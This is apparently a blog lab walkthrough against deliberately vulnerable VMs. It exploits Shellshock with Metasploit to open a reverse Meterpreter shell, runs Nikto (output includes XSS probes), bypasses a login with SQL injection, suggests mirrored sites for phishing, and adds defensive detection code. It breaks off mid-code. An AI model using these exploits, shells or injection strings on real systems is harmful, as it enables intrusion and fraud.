Friday, August 16, 2019

Web Server and SQL Injection Attack, Nikto and Wordpress Scan

Injection attacks occur when an attacker can pass commands through a web server to a backend system, bypassing the normal security controls because the backend trusts whatever arrives from the web server. The most common form is the SQL injection attack, which abuses a web application to send unauthorized commands to the backend database server. Web applications routinely take input from users and splice it into a database query whose results are sent back to the user; when that input is not kept separate from the query text, the user ends up controlling part of the query.


HTTrack

HTTrack allows users to copy or "mirror" websites from the Internet to a local computer. It can be downloaded as a standalone tool or downloaded and installed in Kali with the apt-get install command.

Open a terminal in Kali > type apt-get install webhttrack > type y and press Enter to continue.


After installation is done, type webhttrack > press Enter.

Choose a Language preference > click Next.


Type a New project name > click Next.


Type the Web Address or URL > click Next.

Try2hack.nl is a website that you are free to hack online; it consists of challenges, or levels, in which you break into the site.


Leave the default setting > click Start.



Click Browse Mirrored Website



The web pages and files are saved under Home > websites > COPTRY2HACK > www.try2hack.nl

You can then perform offline web server attacks (study the source code) or modify the copied site and use it for social engineering attacks (phishing scams).



Web Server (Apache) Attack

I used the Metasploitable2 VM to act as the web (Apache) server and typed the echo commands in the nano editor.

msfadmin@metasploitable:~$ cd /usr/lib/cgi-bin
msfadmin@metasploitable:/usr/lib/cgi-bin$ sudo nano web.sh
[sudo] password for msfadmin: <msfadmin>

Type the echo commands > once finished hit Ctrl-X to exit > press y.


Press Enter (or type a new file name).


Make the file executable using chmod:

msfadmin@metasploitable:/usr/lib/cgi-bin$ sudo chmod 755 web.sh

I made a test by opening a web browser on my Windows 10 machine and typed the URL 192.168.1.120/cgi-bin/web.sh


Start the PostgreSQL database that Metasploit uses, then launch the Metasploit Framework console.


root@kali:~# service postgresql start
root@kali:~# msfconsole
[*] Starting the Metasploit Framework consOle...-

  Metasploit Park, System Security Interface
  Version 4.0.5, Alpha E
  Ready...
  > access security
  access: PERMISSION DENIED.
  > access security grid
  access: PERMISSION DENIED.
  > access main security grid
  access: PERMISSION DENIED....and...
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!


       =[ metasploit v4.17.11-dev                         ]
+ -- --=[ 1807 exploits - 1028 auxiliary - 313 post       ]
+ -- --=[ 539 payloads - 42 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]


Select the Apache mod_cgi Bash environment-variable exploit (Shellshock, CVE-2014-6271) and set its options: LHOST is the Kali machine, RHOST the Metasploitable2 target, TARGETURI the CGI script created above, and the payload a reverse-TCP Meterpreter.
msf > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set LHOST 192.168.1.110
LHOST => 192.168.1.110
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOST 192.168.1.120
RHOST => 192.168.1.120
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/web.sh
TARGETURI => /cgi-bin/web.sh
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options

Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CMD_MAX_LENGTH  2048             yes       CMD max line length
   CVE             CVE-2014-6271    yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
   HEADER          User-Agent       yes       HTTP header to use
   METHOD          GET              yes       HTTP method to use
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           192.168.1.120    yes       The target address
   RPATH           /bin             yes       Target PATH for binaries used by the CmdStager
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /cgi-bin/web.sh  yes       Path to CGI script
   TIMEOUT         5                yes       HTTP read response timeout (seconds)
   URIPATH                          no        The URI to use for this exploit (default is random)
   VHOST                            no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.110    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


Launch the Apache exploit against the remote target, the MSPLOIT VM (192.168.1.120).
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit

[*] Started reverse TCP handler on 192.168.1.110:4444
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (861480 bytes) to 192.168.1.120
[*] Meterpreter session 1 opened (192.168.1.110:4444 -> 192.168.1.120:49667) at 2018-10-30 04:53:34 -0400

meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system's local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    shell         Drop into a system command shell
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Stdapi: Mic Commands
====================

    Command       Description
    -------       -----------
    listen        listen to a saved audio recording via audio player
    mic_list      list all microphone interfaces
    mic_start     start capturing an audio stream from the target mic
    mic_stop      stop capturing audio


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play an audio file on target system, nothing written on disk


With the session open, you can gather information about the machine using the commands listed by help (for example sysinfo, ifconfig and shell).
meterpreter > sysinfo
Computer     : metasploitable.localdomain
OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux


meterpreter > ifconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 16436
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::


Interface  2
============
Name         : eth0
Hardware MAC : 00:0c:29:fa:dd:2a
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.1.120
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:fefa:dd2a
IPv6 Netmask : ffff:ffff:ffff:ffff::


meterpreter > shell
Process 30362 created.
Channel 1 created.

pwd
/usr/lib/cgi-bin

ls
php
php5
web.sh
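From the defender's side, the attempt above leaves a trace: the module sends its payload in the User-Agent header of a request to the CGI script, and Apache writes that header into access.log. The following detector is an added example, not code from the original post or from Metasploit. It parses Apache "combined" log lines and flags the "() {" function-definition prefix that both CVE-2014-6271 and CVE-2014-6278 depend on; the log lines it runs on are constructed for the example, and the URL-decoding of the request line is a broadening of the check beyond the header-based attempt shown above.

```python
# Added example; not code from the original post or from Metasploit.
# Flags Shellshock-style requests (CVE-2014-6271 / CVE-2014-6278) in an
# Apache "combined" access log. The module used above delivers its payload
# in the User-Agent header of a request to the CGI script, and Apache logs
# that header verbatim, so the attempt is visible in access.log.
import re
from urllib.parse import unquote

# LogFormat "combined": host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# An exported bash function definition starts with "() {"; both CVEs rely on
# that prefix, whichever header carries it, so it is the signature to match.
SHELLSHOCK = re.compile(r"\(\)\s*\{")


def parse_combined(line):
    """Split one combined-format line into fields; None if it does not parse."""
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def shellshock_hits(lines):
    """Return (client, path, field) for each request carrying the signature.
    The request line is URL-decoded first so a percent-encoded copy of the
    signature in the URL is flagged as well; header fields are checked as logged."""
    hits = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue  # not combined format (or a mangled line): skip, don't crash
        parts = rec["request"].split(" ")
        path = parts[1] if len(parts) > 1 else rec["request"]
        checks = {
            "request": unquote(rec["request"]),
            "referer": rec["referer"],
            "agent": rec["agent"],
        }
        for field, value in checks.items():
            if SHELLSHOCK.search(value):
                hits.append((rec["host"], path, field))
                break  # one hit per line is enough
    return hits


# Constructed sample log: the first and third lines carry the signature
# (in User-Agent and Referer), the second is the browser test from the
# post, and the last one is malformed and must be skipped.
SAMPLE_LOG = [
    '192.168.1.110 - - [30/Oct/2018:04:53:34 -0400] "GET /cgi-bin/web.sh HTTP/1.1" 200 512 "-" "() { :;}; echo vulnerable"',
    '192.168.1.50 - - [30/Oct/2018:04:55:10 -0400] "GET /cgi-bin/web.sh HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '192.168.1.110 - - [30/Oct/2018:04:56:02 -0400] "GET /cgi-bin/web.sh HTTP/1.1" 200 512 "() { :;}; echo vulnerable" "curl/7.61.0"',
    'truncated line without the expected fields',
]

if __name__ == "__main__":
    for hit in shellshock_hits(SAMPLE_LOG):
        print("possible Shellshock attempt from %s against %s (in %s)" % hit)
```

Run it against a real access.log by replacing SAMPLE_LOG with the file's lines; quotes inside a header are escaped by Apache as \", which the simple "[^"]*" field pattern does not handle, so a production parser should use the mod_log_config escaping rules.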


Nikto

Nikto is an open source (GPL) web server scanner that runs comprehensive tests against web servers: it looks for dangerous files and programs and for outdated server versions, checks server configuration items such as the presence of multiple index files and the HTTP server options, and attempts to identify the installed web server and software.



root@kali:~# nikto
- Nikto v2.1.6
---------------------------------------------------------------------------
+ ERROR: No host specified

       -config+            Use this config file
       -Display+           Turn on/off display outputs
       -dbcheck            check database and other key files for syntax errors
       -Format+            save file (-o) format
       -Help               Extended help information
       -host+              target host
       -id+                Host authentication to use, format is id:pass or id:pass:realm
       -list-plugins       List all available plugins
       -output+            Write output to this file
       -nossl              Disables using SSL
       -no404              Disables 404 checks
       -Plugins+           List of plugins to run (default: ALL)
       -port+              Port to use (default 80)
       -root+              Prepend root value to all requests, format is /directory
       -ssl                Force ssl mode on port
       -Tuning+            Scan tuning
       -timeout+           Timeout for requests (default 10 seconds)
       -update             Update databases and plugins from CIRT.net
       -Version            Print plugin and database versions
       -vhost+             Virtual host (for Host header)
                + requires a value

        Note: This is the short help output. Use -H for full help text.

root@kali:~#
root@kali:~# nikto -host 192.168.1.120     // MSPLOIT2 VM
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.120
+ Target Hostname:    192.168.1.120
+ Target Port:        80
+ Start Time:         2018-11-05 22:32:52 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) DAV/2
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>: Output from the phpinfo() function was found.
+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpMyAdmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Server leaks inodes via ETags, header found with file /phpMyAdmin/ChangeLog, inode: 92462, size: 40540, mtime: Tue Dec  9 12:24:00 2008
+ OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /test/: Directory indexing found.
+ OSVDB-3092: /test/: This might be interesting...
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ /phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>: Output from the phpinfo() function was found.
+ /phpinfo.php?cx[]=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<script>alert(foo)</script>: Output from the phpinfo() function was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpMyAdmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpMyAdmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 8347 requests: 0 error(s) and 29 item(s) reported on remote host
+ End Time:           2018-11-05 22:33:23 (GMT-5) (31 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
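Several of the findings above are decided purely from response headers and the allowed methods: the three missing security headers, the version strings in Server and X-Powered-By, TRACE being active, and the ETag that leaks an inode. The checker below is an added example and not Nikto's own code; it reproduces those checks offline on a header dict and a list of allowed methods. The header sets are constructed: the first is modelled on the Nikto output (Server, X-Powered-By, and the inode/size inside the ETag match it, the mtime field is made up), the second shows the same server after the corresponding Apache settings are corrected.

```python
# Added example, not Nikto's own code: an offline checker for the header-level
# findings Nikto raised above (missing X-Frame-Options / X-Content-Type-Options /
# X-XSS-Protection, version strings in Server and X-Powered-By, TRACE enabled,
# and an Apache inode-size-mtime ETag). It takes a dict of response headers and
# the methods the server allows, so the sample data below is constructed.
import re

SECURITY_HEADERS = {
    "X-Frame-Options": "anti-clickjacking X-Frame-Options header is not present",
    "X-Content-Type-Options": "X-Content-Type-Options header is not set (use 'nosniff')",
    "X-XSS-Protection": "X-XSS-Protection header is not defined",
}
VERSION_RE = re.compile(r"\d+\.\d+")
# Apache 2.2's default FileETag (INode MTime Size) emits "inode-size-mtime",
# three hex fields, mtime in microseconds since the epoch. Apache 2.4 dropped
# INode from the default, which is why a two-field ETag is not decoded here.
APACHE_ETAG = re.compile(r'^(?:W/)?"?([0-9a-f]+)-([0-9a-f]+)-([0-9a-f]+)"?$', re.IGNORECASE)


def decode_apache_etag(etag):
    """Return (inode, size, mtime_seconds) for an inode-size-mtime ETag, else None."""
    m = APACHE_ETAG.match(etag.strip())
    if not m:
        return None
    inode, size, mtime_us = (int(g, 16) for g in m.groups())
    return inode, size, mtime_us / 1_000_000


def audit_response(headers, allowed_methods=()):
    """List the findings for one response; header names are matched case-insensitively."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []
    for name, message in SECURITY_HEADERS.items():
        if name.lower() not in h:
            findings.append(message)
    for banner in ("server", "x-powered-by"):
        if banner in h and VERSION_RE.search(h[banner]):
            findings.append(f"version disclosed in {banner}: {h[banner]}")
    if "TRACE" in {m.upper() for m in allowed_methods}:
        findings.append("HTTP TRACE method enabled (XST)")
    if "etag" in h:
        decoded = decode_apache_etag(h["etag"])
        if decoded:
            findings.append(f"ETag leaks inode {decoded[0]} and size {decoded[1]}")
    return findings


# Constructed headers modelled on the Nikto output above (Server, X-Powered-By and
# the inode/size in the ETag match it; the mtime field is a made-up value).
METASPLOITABLE_HEADERS = {
    "Server": "Apache/2.2.8 (Ubuntu) DAV/2",
    "X-Powered-By": "PHP/5.2.4-2ubuntu5.10",
    "ETag": '"1692e-9e5c-45d9c37d79800"',
    "Content-Type": "text/html",
}
# The same server after hardening: ServerTokens Prod, the three headers set,
# FileETag without INode, and TRACE switched off (TraceEnable off).
HARDENED_HEADERS = {
    "Server": "Apache",
    "X-Frame-Options": "DENY",
    "X-Content-Type-Options": "nosniff",
    "X-XSS-Protection": "0",
    "ETag": '"9e5c-45d9c37d79800"',
    "Content-Type": "text/html",
}

if __name__ == "__main__":
    print(audit_response(METASPLOITABLE_HEADERS, ("GET", "HEAD", "POST", "OPTIONS", "TRACE")))
    print(audit_response(HARDENED_HEADERS, ("GET", "HEAD", "POST")))
```

To use it on a live host, feed it the headers from a HEAD request and the Allow list from an OPTIONS request; the X-Powered-By banner goes away with expose_php = Off in php.ini, and the hardened header set is what a fixed Metasploitable2-style server should return.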


OWASP Broken Web Application (BWA)

OWASP Broken Web Applications Project is a collection of vulnerable web applications that is distributed on a Virtual Machine.

Download and extract the OWASP Broken Web Application. Double-click on the VMWare configuration file (2 KB).

Right-click on the VM > Settings > Network Adapter > choose Custom: Specific virtual network > VMnet0



I renamed the VM to BWAPP. Click Power ON (green arrow icon). Type the login: root/owaspbwa (already displayed)


I changed the BWAPP VM IP address to 192.168.1.140/24 using the command: ifconfig eth0 192.168.1.140 netmask 255.255.255.0


I browsed over HTTP to BWAPP from the Windows 7 machine using the new IP address (192.168.1.140). Click on OWASP Mutillidae II.


Hover to OWASP 2013 > A1 - Injection (SQL) > SQLi - Bypass Authentication > Login


To view hints or the steps in performing SQL Injection attacks, click Toggle Hints > Authentication Bypass.



In the Username field, type: ' 'a' = 'a' -- 

Note that there is a space after the -- (the comment marker needs it).


Notice that the status changed to "User Authenticated" and the page shows a logged-in admin named admin.
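The bypass works because the login page builds its SQL by pasting the username straight into the query, the mistake described in the introduction. The snippet below is an added example, not code from Mutillidae or the original post: a throwaway SQLite accounts table (constructed data) queried first by string concatenation and then with a bound parameter, so the same tautology-plus-comment input can be seen succeeding against one and failing against the other. SQLite does not concatenate adjacent string literals, so the payload here is written with an explicit OR rather than the exact string typed into Mutillidae.

```python
# Added example (not from Mutillidae or the original post): the authentication
# bypass from the lab, reproduced against an in-memory SQLite table, first with
# string concatenation and then with a parameterised query. Table name, columns
# and rows are constructed for the example.
import sqlite3


def make_db():
    """Build a throwaway accounts table with two constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT, is_admin INTEGER)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [("admin", "adminpass", 1), ("alice", "wonderland", 0)],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Composes the WHERE clause by concatenation, which is exactly what the
    injection exploits. Returns the first matching username, or None."""
    query = (
        "SELECT username FROM accounts WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Binds the input as parameters; it never reaches the SQL parser as code."""
    row = conn.execute(
        "SELECT username FROM accounts WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# The tautology-plus-comment input from the lab, written with an explicit OR
# for SQLite. The trailing space after "--" matters, as the lab notes.
BYPASS = "' OR 'a' = 'a' -- "


def demo():
    """Run the same input through both login functions and return the outcomes."""
    conn = make_db()
    return {
        "vulnerable": login_vulnerable(conn, BYPASS, "anything"),  # 'admin': whole WHERE is true
        "safe": login_safe(conn, BYPASS, "anything"),              # None: treated as a literal name
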